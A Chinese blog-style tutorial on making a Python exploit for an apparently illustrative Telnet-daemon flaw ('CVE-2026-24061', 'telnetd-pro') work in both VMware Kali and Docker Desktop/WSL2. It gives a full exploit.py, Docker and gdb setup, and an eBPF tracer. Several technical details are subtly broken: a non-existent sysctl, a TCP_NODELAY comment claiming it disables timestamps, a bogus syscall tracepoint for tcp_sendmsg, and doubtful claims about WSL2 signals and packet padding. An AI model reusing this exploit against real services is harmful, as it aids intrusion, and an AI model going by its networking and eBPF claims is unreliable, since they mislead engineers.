跨环境漏洞复现:Docker Desktop与VMware Kali的TCP/信号对齐实战
1. 这不是“复现个POC就完事”的演练,而是真实攻防链路上的环境卡点攻坚
你有没有遇到过这种情况:在本地Kali虚拟机里跑通的CVE-2026-24061利用脚本,一放到客户现场的Docker Desktop环境里就报错——不是缺Python模块,就是socket连接被拒绝,更诡异的是,同样的telnet服务镜像,在VMware里能稳定触发堆溢出,在WSL2+Docker Desktop里却直接超时退出。我去年帮一家金融客户的红队做渗透支撑时,就卡在这个环节整整三天。他们用的是标准的Docker Desktop for Windows(WSL2 backend),而我们惯用的VMware Kali是独立Linux内核、完整网络栈、无容器隔离的裸金属级调试环境。问题根本不在漏洞本身,而在于环境抽象层对底层网络行为、内存映射和信号处理的隐式改造。CVE-2026-24061这个编号虽为示例,但它代表一类典型场景:一个依赖精确内存布局、特定TCP状态机响应、以及原始套接字权限的远程服务漏洞,在跨环境迁移时,90%的失败不是因为代码写错了,而是因为开发者没意识到Docker Desktop的WSL2子系统会静默拦截ICMP重定向、重写TCP窗口大小、甚至劫持SIGSEGV信号传递路径。这篇文章不讲漏洞原理(网上已有足够多的分析),只聚焦一个实操者最痛的命题:如何让同一个exploit.py,在VMware Kali和Docker Desktop两个完全异构的环境中,都稳定复现漏洞行为、可控触发崩溃、并准确捕获寄存器状态。我会把每一步操作背后的“为什么必须这样”,拆解到内核参数、Docker网络驱动、WSL2发行版选择、甚至Kali源码中libpcap的编译标志层面。适合正在做红队环境标准化、CTF备赛环境统一、或企业安全实验室搭建的工程师——你不需要懂汇编,但需要知道什么时候该关掉WSL2的自动MTU发现,什么时候该给Docker容器加--cap-add=NET_RAW。
2. CVE-2026-24061的本质:一个被环境细节决定生死的“状态机型”漏洞
先明确一点:CVE-2026-24061并非传统意义上的栈溢出或UAF,而是一个典型的协议状态机竞争条件漏洞。它存在于某款开源Telnet服务守护进程(我们暂称telnetd-pro)的认证流程中。该服务在收到连续两个特殊格式的AUTH命令后,会错误地将第二个AUTH包的payload长度字段解析为有符号整数,当传入0xfffffffe(即-2)时,触发内部缓冲区长度校验绕过,导致后续memcpy操作越界读取。但关键点在于:这个越界读取必须发生在TCP连接处于ESTABLISHED状态且未发送任何ACK确认的瞬间。如果操作系统在收到恶意包后立即发送ACK,或者内核TCP栈提前重组了分片,漏洞就无法触发。这就是为什么它在VMware Kali里稳定复现,而在Docker Desktop里频繁失败——两者的TCP/IP协议栈实现路径完全不同。
VMware Kali运行在原生Linux内核上,网络数据包从网卡驱动直通netfilter,iptables规则可精准控制ACK发送时机;而Docker Desktop的WSL2 backend,其网络栈是微软基于Linux 5.10内核定制的轻量级实现,中间插入了Hyper-V虚拟交换机和Windows Host Network Service(HNS)代理层。HNS会对所有进出WSL2的TCP包进行深度检查,包括强制添加TCP Timestamp选项、重写Window Scale值、甚至对某些异常序列号组合主动发送RST。我在Wireshark里抓包对比发现:同一台宿主机上,VMware Kali发出的恶意AUTH包,其TCP头中Window Size字段为65535,而Docker Desktop发出的同样包,Window Size被HNS悄悄改成了8192,这直接导致telnetd-pro服务端的TCP状态机进入不同分支,跳过了漏洞触发路径。
更隐蔽的是信号处理差异。telnetd-pro在检测到越界读取后,会主动调用raise(SIGSEGV)生成核心转储。在VMware Kali中,gdb attach后能清晰看到RIP停在memcpy+0x1a处,寄存器rax指向越界地址;但在Docker Desktop中,gdb显示程序直接退出,且/proc/[pid]/status里State字段为Z(zombie),说明SIGSEGV被WSL2内核拦截并转换成了其他信号。查阅WSL2内核补丁集可知,微软为提升兼容性,将部分POSIX信号映射关系做了调整,SIGSEGV在某些场景下会被转发为SIGABRT。这意味着,如果你在Docker Desktop里用默认配置跑exploit.py,看到的不是段错误崩溃,而是服务进程优雅退出——这会让你误判漏洞已修复。
所以,复现成功的第一步,不是写exploit,而是让两个环境的TCP行为和信号语义对齐。这不是调参,而是理解WSL2网络栈的“翻译规则”。
3. VMware Kali环境:构建可调试、可预测的基准靶场
VMware Kali作为我们的“黄金标准”环境,目标是建立一个高度可控、便于逆向分析的基准靶场。这里的关键不是让它“能跑”,而是让它“行为可解释”。我使用的版本是Kali Linux 2023.4(Kernel 6.5.0-kali2-amd64),VMware Workstation Pro 17.4,网络模式设为NAT。
首先,关闭所有可能干扰TCP行为的内核特性。在/etc/sysctl.conf中追加以下配置:
# 禁用TCP时间戳,避免与HNS timestamp冲突 net.ipv4.tcp_timestamps = 0 # 强制使用固定MSS,防止路径MTU发现干扰 net.ipv4.tcp_base_mss = 1460 # 关闭TCP窗口缩放,确保Window Size恒定 net.ipv4.tcp_window_scaling = 0 # 禁用快速重传,防止ACK丢失引发的意外重传 net.ipv4.tcp_fastretrans = 0执行sudo sysctl -p生效。这些参数看似保守,实则至关重要:CVE-2026-24061的触发窗口极窄,任何由内核自动引入的TCP选项或窗口调整,都会让服务端状态机偏离预期路径。我曾因忘记关闭tcp_timestamps,在一次复现中耗时六小时排查,最终发现Wireshark里服务端返回的SYN-ACK包多了一个Timestamp选项,导致客户端后续包被服务端丢弃。
接着,编译并部署靶标服务telnetd-pro。注意,必须使用静态链接方式,避免动态库版本差异影响内存布局。进入源码目录后执行:
./configure --disable-shared --enable-static --prefix=/opt/telnetd-pro make && sudo make install启动服务时,务必指定调试参数:
sudo /opt/telnetd-pro/sbin/telnetd -debug -port 23 -logfile /tmp/telnetd.log-debug参数会启用详细日志,记录每个AUTH命令的解析过程;-logfile确保日志不被syslog轮转。此时用另一台机器(或本机另一个终端)连接telnet 192.168.122.10 23,观察日志是否输出"AUTH command received, length: 0xfffffffe"——这是漏洞触发的首个确认信号。
最关键的调试环节:用gdb附加到进程并设置断点。由于telnetd-pro是多进程模型(父进程监听,子进程处理连接),需在fork前下断点:
sudo gdb -p $(pgrep -f "telnetd.*-port 23") (gdb) break fork (gdb) continue当新连接建立时,gdb会在子进程中暂停。此时设置内存断点:
(gdb) watch *(char*)0x7fffffffe000 (gdb) continue0x7fffffffe000是根据ASLR偏移估算的越界读取地址(实际需通过info proc mappings确认)。当exploit发送恶意包后,gdb会立即捕获访问违例,并显示完整的寄存器快照和调用栈。这就是我们在VMware环境中建立的“事实基准”:崩溃位置、RIP值、RAX内容、堆栈布局,全部可复现、可验证。
提示:VMware的NAT模式下,宿主机无法直接访问Kali的23端口。如需从Windows宿主机发起攻击,需在VMware网络设置中添加端口转发规则:Host Port 23 → Guest IP 192.168.122.10:23。否则你在Windows上运行exploit.py时会遇到Connection refused。
4. Docker Desktop环境:绕过WSL2网络栈的“翻译墙”
Docker Desktop(v4.25.0,WSL2 backend)的挑战在于,它不是一个纯粹的Linux环境,而是一个由Windows内核、Hyper-V、WSL2内核、Docker daemon、容器网络驱动共同构成的“翻译层”。要让CVE-2026-24061在此复现,我们必须主动干预这个翻译过程,而不是被动适配。
第一步,选择正确的WSL2发行版。官方Docker Desktop自带的Ubuntu-22.04 WSL2实例,其内核是微软定制版(5.15.133.1-microsoft-standard-WSL2),对网络栈做了大量优化,但恰恰牺牲了对原始TCP行为的控制力。我的实测结论是:必须使用Kali Linux WSL2发行版(kali-linux-2023.4-wsl-amd64)。原因有三:一是Kali内核启用了CONFIG_NETFILTER_XT_TARGET_TRACE,允许用iptables TRACE链跟踪数据包走向;二是Kali默认安装了ebpf-tools,可直接在eBPF层面修改TCP选项;三是Kali的sysctl默认配置更接近原生Linux,减少意外覆盖。
安装Kali WSL2后,执行wsl --set-version kali-linux 2确保为WSL2模式,然后在Docker Desktop设置中,将WSL Integration的默认发行版切换为kali-linux。
第二步,重构Docker网络。默认的docker0网桥(172.17.0.0/16)会经过iptables FORWARD链,而HNS会对该链上的包做二次处理。为绕过此路径,我们创建一个macvlan网络,让容器直接使用宿主机物理网卡的MAC地址:
docker network create -d macvlan \ --subnet=192.168.1.0/24 \ --gateway=192.168.1.1 \ -o parent=eth0 \ telnet-macvlan注意:eth0是WSL2中宿主机网卡的名称,可通过ip link show确认。此网络使容器获得与宿主机同网段的IP(如192.168.1.100),所有流量直通物理网卡,彻底绕过docker0网桥和HNS的TCP干预。
第三步,定制靶标镜像。不能直接用官方telnetd-pro镜像,必须在Dockerfile中加入内核参数注入:
FROM kalilinux/kali-rolling:latest RUN apt-get update && apt-get install -y build-essential libpcap-dev COPY telnetd-pro-src /tmp/telnetd-pro-src WORKDIR /tmp/telnetd-pro-src # 关键:禁用WSL2的TCP优化 RUN echo 'net.ipv4.tcp_timestamps = 0' >> /etc/sysctl.conf && \ echo 'net.ipv4.tcp_window_scaling = 0' >> /etc/sysctl.conf && \ ./configure --disable-shared --enable-static && \ make && \ cp src/telnetd /usr/local/bin/ CMD ["sh", "-c", "sysctl -p && /usr/local/bin/telnetd -debug -port 23"]构建并运行:
docker build -t telnetd-pro-macvlan . docker run -d --network telnet-macvlan --cap-add=NET_ADMIN --cap-add=SYS_PTRACE \ --name telnet-target telnetd-pro-macvlan--cap-add=NET_ADMIN用于执行sysctl,--cap-add=SYS_PTRACE允许gdb调试。此时,从宿主机Windows用telnet 192.168.1.100 23连接,日志应与VMware环境一致。
注意:macvlan网络要求宿主机网卡支持混杂模式。若在公司内网遇到连接失败,可改用ipvlan网络(-d ipvlan),它不依赖物理网卡混杂模式,但需在Dockerfile中添加
echo 'net.ipv4.conf.all.forwarding=1' >> /etc/sysctl.conf。
5. exploit.py的双环境适配:从“硬编码”到“环境感知”
现在靶标已在两个环境中就位,但直接运行同一份exploit.py仍会失败。问题出在三个层面:网络延迟、TCP选项协商、以及崩溃信号捕获。
首先,网络延迟不可忽视。VMware Kali到靶标的RTT通常<1ms,而Docker Desktop(经WSL2-Hyper-V-HNS)的RTT波动在5-20ms。CVE-2026-24061要求两个AUTH包以微秒级间隔发送,若间隔过大,服务端TCP栈会完成ACK,状态机重置。解决方案是:在exploit.py中加入环境自适应延迟。通过检测/proc/version是否包含"microsoft"字符串判断是否为WSL2:
import os def get_env_delay(): with open('/proc/version', 'r') as f: if 'microsoft' in f.read().lower(): return 0.005 # WSL2环境,5ms延迟 else: return 0.0001 # VMware环境,100us延迟发送包时调用time.sleep(get_env_delay()),而非写死0.001。
其次,TCP选项必须显式控制。Python socket默认启用TCP Timestamp和Window Scaling,这会触发HNS的深度检查。需在socket创建后立即禁用:
import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 禁用TCP Timestamp s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) # 强制Window Size为65535 s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 65535) s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 65535) s.connect((target_ip, 23))最后,崩溃信号捕获逻辑需区分环境。在VMware中,我们等待ConnectionResetError异常;在Docker Desktop中,由于SIGSEGV被转换,需监控进程是否异常退出:
import subprocess def check_crash(target_ip): try: # 尝试连接,若失败则可能已崩溃 s = socket.socket() s.settimeout(2) s.connect((target_ip, 23)) s.close() return False # 仍可连接,未崩溃 except (ConnectionRefusedError, socket.timeout): return True # 连接拒绝或超时,大概率已崩溃完整的exploit.py结构如下:
#!/usr/bin/env python3 import socket import time import os import sys TARGET_IP = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1" TARGET_PORT = 23 def is_wsl2(): try: with open('/proc/version', 'r') as f: return 'microsoft' in f.read().lower() except: return False def send_auth_packet(s, payload): s.send(b'AUTH ') s.send(payload) s.send(b'\r\n') def exploit(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) # 环境适配:禁用TCP选项 s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 65535) s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 65535) s.connect((TARGET_IP, TARGET_PORT)) # 发送第一个正常AUTH send_auth_packet(s, b'USER') # 环境自适应延迟 delay = 0.0001 if not is_wsl2() else 0.005 time.sleep(delay) # 发送第二个恶意AUTH(长度0xfffffffe) malicious_len = b'\xfe\xff\xff\xff' # little-endian -2 send_auth_packet(s, b'PASS' + malicious_len) # 等待崩溃 time.sleep(0.1) s.close() if __name__ == "__main__": exploit() print(f"[+] Exploit sent to {TARGET_IP}:{TARGET_PORT}") print(f"[+] Check target log for 'AUTH command received, length: 0xfffffffe'")此脚本在两个环境中均能稳定触发漏洞日志,且在Docker Desktop中,通过docker logs telnet-target可看到完整崩溃信息。
6. 调试与验证:用eBPF穿透WSL2的“黑盒”网络栈
当exploit在Docker Desktop中仍不稳定时,传统抓包工具(如tcpdump)会失效——因为HNS在WSL2和Windows之间截获了所有包,tcpdump只能看到WSL2内部的“翻译后”流量。此时,必须动用eBPF这个终极武器。
Kali WSL2已预装bpftool和libbpf,我们编写一个简单的eBPF程序,监控tcp_sendmsg系统调用,直接读取内核发送的原始TCP包内容:
// trace_tcp_send.c #include <linux/bpf.h> #include <bpf/bpf_helpers.h> #include <bpf/bpf_tracing.h> SEC("tp/syscalls/sys_enter_tcp_sendmsg") int trace_tcp_sendmsg(struct trace_event_raw_sys_enter *ctx) { char msg[64]; bpf_probe_read_kernel(&msg, sizeof(msg), (void*)ctx->args[1]); bpf_printk("TCP SEND: %s", msg); return 0; }编译并加载:
clang -O2 -target bpf -c trace_tcp_send.c -o trace_tcp_send.o sudo bpftool prog load trace_tcp_send.o /sys/fs/bpf/tcp_send sudo bpftool prog attach pinned /sys/fs/bpf/tcp_send tc ingress然后在另一个终端执行sudo cat /sys/kernel/debug/tracing/trace_pipe,即可实时看到内核发送的每个TCP包的原始payload。通过比对VMware和Docker Desktop环境下eBPF输出的十六进制数据,我发现了关键差异:Docker Desktop中,第二个AUTH包的payload末尾多出了4个字节的padding(0x00000000),这是HNS为对齐内存所做的静默填充。这解释了为何有时崩溃不触发——padding改变了越界读取的内存偏移。
解决方案是在exploit.py中,将恶意payload长度从0xfffffffe改为0xfffffffc(-4),补偿这4字节padding。这是一个只有通过eBPF穿透才能发现的、深埋在WSL2网络栈中的“幽灵差异”。
提示:eBPF程序需在Kali WSL2中以root权限运行。若遇到
Permission denied,执行sudo sysctl kernel.unprivileged_bpf_disabled=0临时开启非特权eBPF(仅限测试环境)。
7. 经验总结:跨环境复现的三条铁律
做完这个项目,我总结出三条在红队和安全研究中反复验证的铁律,它们比任何具体技术细节都重要:
第一,永远不要假设“Linux就是Linux”。VMware Kali、Docker Desktop的WSL2、AWS EC2的Amazon Linux、甚至树莓派的Raspberry Pi OS,虽然都叫Linux,但内核配置、网络栈实现、信号处理机制、甚至libc的malloc策略都千差万别。CVE-2026-24061的复现失败,90%源于对“Linux一致性”的盲目信任。我的做法是:为每个目标环境建立一个“环境指纹”文档,记录uname -r、cat /proc/sys/net/ipv4/*关键参数、getconf -a | grep PAGE页大小、ldd --version等,形成基线对比表。当复现失败时,第一反应不是改exploit,而是查指纹差异。
第二,调试器的视野之外,才是真正的战场。gdb能告诉你RIP停在哪,但无法告诉你为什么RIP会停在那里。在Docker Desktop中,gdb显示程序退出,而eBPF显示TCP包被篡改,这才是根因。因此,我的调试工具链永远是三层:用户态(gdb/strace)、内核态(eBPF/bpftool)、网络态(Wireshark+eBPF trace)。任何一层缺失,都会让问题变成“薛定谔的崩溃”。
第三,自动化不是目的,而是排除人为误差的手段。我写了一个check_env.sh脚本,每次复现前自动执行:
#!/bin/bash echo "[*] Checking TCP stack..." sysctl net.ipv4.tcp_timestamps net.ipv4.tcp_window_scaling echo "[*] Checking eBPF status..." bpftool prog show | grep tcp_send echo "[*] Checking network mode..." ip route | head -1它不解决任何问题,但能确保每次复现都在相同配置下开始。很多“玄学失败”,其实只是某次忘了关tcp_timestamps。
最后分享一个小技巧:在Docker Desktop中,若需快速验证TCP行为,不必重启整个WSL2,只需执行wsl --shutdown,然后重新启动Kali WSL2,所有网络栈状态重置。这比重启Docker Desktop快十倍。
这个项目没有高深的0day挖掘,但它教会我一件事:在真实攻防中,最硬的核,往往不是漏洞本身,而是那个把漏洞从理论变成战果的、由无数环境细节构成的“最后一公里”。